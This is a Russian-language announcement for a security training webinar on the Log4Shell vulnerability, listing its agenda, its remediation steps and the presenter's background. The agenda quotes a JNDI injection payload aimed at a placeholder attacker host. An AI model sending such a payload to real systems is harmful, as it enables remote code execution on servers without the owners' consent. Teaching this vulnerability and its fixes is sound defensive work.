DevOps

Log4Shell на пальцах: как я попал на сервер через заголовок User-Agent
30 сентября 2026, среда, 19:00 по МСК

на вебинаре

time: 90 — 120 минут
live air: отвечаем на все вопросы

Тема открытого вебинара:

  • Принцип: JNDI injection и LDAP
  • Запускаем уязвимое приложение, отправляем ${jndi:ldap://attacker.com/exploit}
  • Лечим: обновляем библиотеку, ставим LOG4J_FORMAT_MSG_NO_LOOKUPS=true.

кто ведёт?
Евгений Саврей

  • Начинал карьеру в ведущих ИБ-компаниях с фокусом на OffSec и практическое моделирование атак.
  • Участвовал в создании учебных киберполигонов и образовательных платформ, готовил международные учения на ПМЭФ с участием 20 стран, а также привлекался к цифровым расследованиям при реальных задержаниях киберпреступников.
  • Сейчас развивает направление Security Awareness, переводя технический опыт атак в понятные и практичные программы обучения для специалистов.
  • В Rebrain помогаю ученикам разбираться в сложных темах и провожу вебинары, делясь практическим опытом из индустрии.
Евгений Саврей

DevOps: Log4Shell на пальцах: как я попал на сервер через заголовок User-Agent

записаться на вебинар >>>

Rebrain

Мы разработали инновационную модель онлайн-практикумов для IT-специалистов.

Через полное погружение в практику и решение реальных кейсов мы помогаем ребятам из любой точки мира получить востребованную профессию.

Fevlake

Международное агентство Devops-практик. Занимаемся проектированием и обслуживанием IT-инфраструктурс 2012 года.

Наши клиенты:
IMPROVE MEDIA, КупиКупон, CRYPTO EXCHANGE, NEWS360 и др.

Файлы куки

При использовании данного сайта, вы подтверждаете свое согласие на использование файлов cookie и других похожих технологий в соответствии с настоящим Уведомлением.